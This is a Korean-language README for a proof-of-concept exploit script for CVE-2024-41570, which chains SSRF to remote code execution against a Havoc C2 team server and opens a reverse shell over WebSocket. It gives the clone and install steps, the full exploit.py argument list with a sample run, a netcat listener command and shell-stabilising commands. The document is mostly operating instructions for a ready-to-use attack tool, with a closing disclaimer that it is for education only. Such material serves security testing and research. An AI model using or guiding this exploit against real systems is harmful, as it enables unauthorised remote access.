
WebSocket을 통한 자동화된 리버스 셸 익스플로잇 | Havoc-C2-SSRF (RCE 포함)
이 프로젝트는 취약한 WebSocket 기반 서비스를 익스플로잇하기 위한 Python 기반 개념 증명(PoC) 스크립트를 제공합니다. 이 스크립트는 에이전트 등록, WebSocket 페이로드 전달 및 원격 명령 실행을 자동화하여 리버스 셸을 설정합니다.
pip install -r requirements.txt
git clone https://github.com/kit4py/CVE-2024-41570.git
cd CVE-2024-41570
pip install -r requirements.txt
다음 인수를 사용하여 스크립트를 실행합니다:
python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>
-t: WebSocket 서버의 대상 URL.-i: Havoc의 Team Server IP 주소.-p: Havoc의 Team Server 포트.-U: WebSocket 인증을 위한 사용자 이름.-P: WebSocket 인증을 위한 비밀번호.-l: 리버스 셸을 위한 리스너 IP (자신의 머신).-L: 리버스 셸을 위한 리스너 포트 (자신의 머신).python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444
nc -lvnp <listener_port>
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-256color
stty rows 67 columns 318
이 스크립트는 다음 Python 라이브러리가 필요합니다:
requestspycryptodome다음 명령으로 설치합니다:
pip install -r requirements.txt
이 스크립트는 교육 목적으로만 제공됩니다. 대상 시스템을 테스트하기 위해 명시적인 승인을 받았는지 확인하세요. 이 스크립트를 오용하면 법률 및 윤리 지침을 위반할 수 있습니다.
Default Havoc Poc에서 영감을 받았습니다.
기여를 환영합니다! 언제든지 리포지토리를 포크하고 풀 리퀘스트를 제출해 주세요.
이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하세요.